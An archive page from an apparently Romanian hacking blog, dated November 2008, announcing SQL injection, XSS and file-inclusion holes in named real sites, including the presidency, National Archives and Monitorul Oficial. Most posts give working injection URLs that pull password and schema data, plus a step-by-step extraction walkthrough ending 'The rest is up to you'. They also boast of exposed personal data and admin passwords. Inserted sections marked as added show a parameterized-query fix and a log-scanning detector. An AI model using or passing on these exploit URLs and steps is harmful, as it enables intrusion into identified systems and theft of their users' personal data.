
    Archive for November, 2008

    Posted by unu in English News

    Posted on November 29th, 2008

    A very high-traffic site with a huge database, vulnerable to Blind SQL Injection. As proof there are screenshots showing that even the subselect function works.

    The www_realitatea_net database, with hundreds of tables

    REMOVED

    Posted by Shocker in English News

    Posted on November 29th, 2008

    SQL Injection to extract users/emails/passwords:

    http://www.pcfarm.ro/prospect.php?id=-1%20UNION%20SELECT%200,(select%20pass%20from%20users%20LIMIT%203,1),2,3,4,5,6,7

    Cross site scripting:

    http://www.pcfarm.ro/dictionar.php?id=%3Cscript%3Ealert(6)%3C/script%3E

    Posted by unu in English News

    Posted on November 28th, 2008

    “A place where you can make new friends, whatever you are looking for, marriage or simple friendship, sex or fun.” Almost 200,000 registered users. Nothing out of the ordinary. The problem starts with a parameter vulnerable to SQL injection. And from there to building the syntax for extracting the data (username, email, password, etc.) is only a small step.
    For example, some of the database's tables:

    And when it comes to users, who do you think is first? The admin, of course.

    Posted by unu in English News

    Posted on November 27th, 2008

    A site with fairly high traffic. “Online prices from Romania. Your shopping expert” (the site's logo). What can I say? Some expert, which, being vulnerable to SQL injection, keeps in plain view all the personal data of those registered: last name, first name, CNP (personal numeric code), ID card series and number, address, phone number, as well as the login data.

    Posted by unu in English News

    Posted on November 27th, 2008

    “The National Archives of Romania, an institution with a 177-year history, subordinated to the Ministry of Internal Affairs and Administrative Reform, has responsibilities in the administration and special protection of the National Archival Fund of Romania”... I quote from the site. Let us hope, though, that the fund is better administered and better protected than the distinguished institution's own web page, which has a serious SQL injection vulnerability. Link to the tables:
    http://www.arhivelenationale.ro/index.php?lan=0&jud=1234999%20union%20all%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables/*
    Even the password for the site's admin account is extractable in clear text. On top of that, it is a simple, easy-to-guess password, unacceptable for a serious site.
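
Added example, not part of the original post: the numeric `jud` parameter handled by string concatenation next to a validated, parameterized lookup, with the stored password kept as a salted PBKDF2 digest instead of clear text. Python's sqlite3 stands in for the site's PHP/MySQL stack, and the `counties` and `users` tables, the function names and the sample password are constructed for the illustration.

```python
import hashlib
import os
import re
import sqlite3

PASSWORD = b"constructed-example-password"  # sample value, not from the page

def make_db():
    """Constructed toy schema; sqlite3 is a stand-in for the real database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE counties(id INTEGER PRIMARY KEY, name TEXT, info TEXT);"
        "CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, pass TEXT);"
        "INSERT INTO counties VALUES (1, 'Alba', 'constructed row');"
    )
    # Store a salted PBKDF2 digest, never the password itself.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", PASSWORD, salt, 600_000)
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)",
                 (salt.hex() + "$" + digest.hex(),))
    return conn

def lookup_unsafe(conn, jud):
    # 'Before' form: the request value is pasted into the SQL text.
    sql = "SELECT id, name, info FROM counties WHERE id = " + jud
    return conn.execute(sql).fetchall()

def lookup_safe(conn, jud):
    # Accept only a short run of ASCII digits, then bind it as a parameter.
    if not re.fullmatch(r"[0-9]{1,9}", jud):
        raise ValueError("jud must be a numeric id")
    sql = "SELECT id, name, info FROM counties WHERE id = ?"
    return conn.execute(sql, (int(jud),)).fetchall()

def demo():
    conn = make_db()
    probe = "1234999 union all select 1,login,pass from users"
    leaked = lookup_unsafe(conn, probe)   # returns the users row
    try:
        lookup_safe(conn, probe)
        rejected = False
    except ValueError:
        rejected = True                   # probe never reaches the database
    return leaked, rejected, lookup_safe(conn, "1")
```

With the concatenated query the `users` row comes back, but only as a salted digest; with the validated lookup the same input is refused before any SQL runs.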

    Posted by Shocker in English News

    Posted on November 26th, 2008

    An obvious LFI with an amusing result when including the file that handles the includes (loader.php):

    (path disclosure on the right)

    Following a specially crafted SQL injection through produse.php… self denial of service, we witness the death of the SQL server:

    Posted by unu in English News

    Posted on November 25th, 2008

    Monitorul Oficial publishes the official publications of the Romanian state, publishes all government decisions, sells books online, etc. So in theory it should be a secure site. But in practice it is not. Link to the schema names:

    http://www.monitoruloficial.ro/magazin/index.php?page=product&id=1234999%20union%20all%20select%201,2,group_concat(schema_name),4,5,6,7%20from%20information_schema.schemata/*

    Among the tables we also find the users table, where the admin's password is in first place

    In the picture (from the email address) you can see that the site's administrator is from the company ete.ro, whose logo goes like this: “We are a company that wants to satisfy absolutely any IT need of your company” (I quote from the company's site). Some satisfaction, given that the passwords of that site are also left in plain view (likewise vulnerable to SQL injection).


    Posted by unu in English News

    Posted on November 24th, 2008

    Yes… again. A short while ago I discovered that the companyid= parameter was vulnerable. At that time I did not make public the syntax for extracting the data. The admins received an email and secured the hole. Conquiztador is a game played in many countries on the same platform. Only the one in Romania had the logoclick.php?companyid= parameter added. What do you think it was for? For advertising. And for whom? Mostly, of course, for the companies belonging to the Pro trust.
    But… and I say but, because this time the parameter found vulnerable is global, valid for the platforms of all the countries where the game is played. (A simple Google search for inurl:”forum_topic.php?fid=” will convince you.) So the vulnerable parameter is fid= in the syntax forum_topic.php?fid= . Still, to be able to exploit the vulnerability we need some SQL knowledge, because the results are not displayed simply, in clear text.
    But anyone can do a small exercise. Let us take the address: http://www.conquiztador.ro/forum_topic.php?fid=5
    and find the number of columns: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, meaning the original page appears. We replace 1 with 2 and so on up to 5, true… At 6 we get http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* an error, so we have 5 columns.
    Now let us find the database version
    select 1,unhex(hex(@@version)),3,4,5 gives the result: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
    The database names are:
    [*] cq_ro
    [*] information_schema
    [*] mysql
    [*] mysql_old
    [*] test

    We are interested in cq_ro. The tables of this database are:


    The rest is up to you.
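
Added example, not part of the original post: a log-side check for the probing sequence the post walks through, that is, ORDER BY column counting followed by UNION SELECT against information_schema. The access-log lines are constructed, and the rule names and function names are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Rule names are illustrative; the patterns mirror the probes quoted in the posts.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "trailing_comment": re.compile(r"/\*\s*$"),
}
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decoded_params(target):
    """Yield (path, name, value); the value is URL-decoded twice (double encoding)."""
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield parts.path, name, unquote_plus(value)

def scan_request(target):
    """Return {param: [rule names]} for query parameters matching any rule."""
    hits = {}
    for _, name, value in decoded_params(target):
        matched = sorted(r for r, rx in RULES.items() if rx.search(value))
        if matched:
            hits[name] = matched
    return hits

def column_count_sweeps(log_lines, min_steps=3):
    """Flag (client, path, param) keys that try several ORDER BY column indexes."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for path, name, value in decoded_params(target):
            n = RULES["order_by_probe"].search(value)
            if n:
                seen[(client, path, name)].add(int(n.group(1)))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_steps}

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [24/Nov/2008:09:59:40 +0200] "GET /forum_topic.php?fid=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Nov/2008:10:00:01 +0200] "GET /forum_topic.php?fid=5+order+by+1/* HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Nov/2008:10:00:03 +0200] "GET /forum_topic.php?fid=5+order+by+2/* HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Nov/2008:10:00:09 +0200] "GET /forum_topic.php?fid=5+order+by+6/* HTTP/1.1" 200 312',
]
```

`column_count_sweeps(SAMPLE_LOG)` reports the one client that stepped through ORDER BY indexes on `fid`; the plain `fid=5` request from the other client is not flagged.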

    Posted by unu in English News

    Posted on November 24th, 2008

    Another high-traffic site, with over 640,000 visitors, offers free access to its database.

    The list of databases is:


    The access passwords for the most important users:


    Posted by unu in English News

    Posted on November 24th, 2008

    It is not only the ministries' sites that are affected by vulnerabilities, but the presidency's page itself. Honestly, what else can we expect then?

    Schema name:

    Link to the tables:

    http://www.presidency.ro/index.php?_RID=fsearch_det&id=1234999′%20union%20all%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables/*

    A note for the “fans” of Base’… do not abuse the insert function
